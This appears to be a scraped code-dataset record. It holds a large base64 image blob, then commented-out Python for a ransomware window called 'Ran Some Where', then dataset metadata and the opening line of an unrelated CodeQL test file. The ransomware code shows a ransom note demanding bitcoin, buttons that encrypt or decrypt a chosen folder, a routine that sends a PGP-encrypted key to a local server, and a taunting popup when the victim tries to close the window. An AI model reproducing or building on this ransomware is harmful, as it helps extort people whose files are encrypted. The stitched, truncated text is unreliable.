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'
# layout = [[sg.Image(size=(900,300),data=data)],
# [sg.Text("Your files have been encrypted. ")],
# [sg.Text("Pay 1000BTC to 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy to recieve decryption key.")],
# [sg.T("")], [sg.Text("Choose a folder: "), sg.Input(key="-DIR-" ,change_submits=True), sg.FolderBrowse(key="-DIR-")],[sg.Button("Submit")],
# [sg.Text("Enter Encryption Key...")],
# [sg.Input(key='-EINPUT-')],
# [sg.Text("Enter Decryption Key...")],
# [sg.Input(key='-DINPUT-')],
# [sg.Text(size=(40,1), key='-OUTPUT-')],
# [sg.Button('Decrypt Files'),sg.Button('Encrypt'), sg.Button('Quit')]
# #[sg.Button('Send a Post')]
# ]
# # Create the window
# window = sg.Window('Ran Some Where', layout, enable_close_attempted_event=True, resizable=True)
# # Display and interact with the Window using an Event Loop
# while True:
# event, values = window.read()
# # See if user wants to quit or window was closed
# # if event == sg.WINDOW_CLOSED or event == 'Quit':
# # break
# # Output a message to the window
# if event == 'Decrypt Files':
# window['-OUTPUT-'].update('Decrypting files with key: ' + values['-DINPUT-'] + ". . .")
# decrypt_data(values['-DINPUT-'], values['-DIR-'])
# # decrypt_data(values['-DINPUT-'], './test/')
# # fast_decrypt('./test/test.txt.pyran', values['-DINPUT-'])
# elif event == 'Encrypt':
# window['-OUTPUT-'].update('Encrypting files with key: ' + values['-EINPUT-'] + ". . .")
# encrypt_data(values['-EINPUT-'], values['-DIR-'])
# elif event == 'Send a Post':
# url = 'http://localhost:8080'
# key = generate_encryption_key(25)
# encrypted_key = pgp_encrypt(key)
# b64encoded_encrypted_key = base64.b64encode(encrypted_key.encode('ascii'))
# print(encrypted_key.encode('utf-8'))
# print(str(b64encoded_encrypted_key))
# obj = {'this': str(b64encoded_encrypted_key)}
# x = requests.post(url, data = obj)
# if (event == sg.WINDOW_CLOSE_ATTEMPTED_EVENT or event == 'Exit') and sg.popup_yes_no('Ah ah ah, leaving so soon? Stick around!') == 'Yes':
# continue
# # Finish up by removing from the screen
# window.close()
| 353.76 | 60,932 | 0.934843 | 2,703 | 70,752 | 24.436922 | 0.780984 | 0.000545 | 0.000848 | 0.000727 | 0.008963 | 0.008417 | 0.006268 | 0.005511 | 0.005511 | 0.005511 | 0 | 0.136348 | 0.024452 | 70,752 | 199 | 60,933 | 355.537688 | 0.820637 | 0.905119 | 0 | 0.147541 | 0 | 0 | 0.542922 | 0.499398 | 0 | 1 | 0 | 0 | 0 | 1 | 0.065574 | false | 0.065574 | 0.081967 | 0 | 0.163934 | 0.040984 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
2a7c5e58847ac4f6803515d4384ac122034e1eb1 | 33 | py | Python | python/ql/test/query-tests/Security/lib/traceback.py | vadi2/codeql | a806a4f08696d241ab295a286999251b56a6860c | [
"MIT"
] | 4,036 | 2020-04-29T00:09:57.000Z | 2022-03-31T14:16:38.000Z | python/ql/test/query-tests/Security/lib/traceback.py | vadi2/codeql | a806a4f08696d241ab295a286999251b56a6860c | [
"MIT"
] | 2,970 | 2020-04-28T17:24:18.000Z | 2022-03-31T22:40:46.000Z | python/ql/test/query-tests/Security/lib/traceback.py | ScriptBox99/github-codeql | 2ecf0d3264db8fb4904b2056964da469372a235c | [
"MIT"
] | 794 | 2020-04-29T00:28:25.000Z | 2022-03-30T08:21:46.000Z | def format_exc():
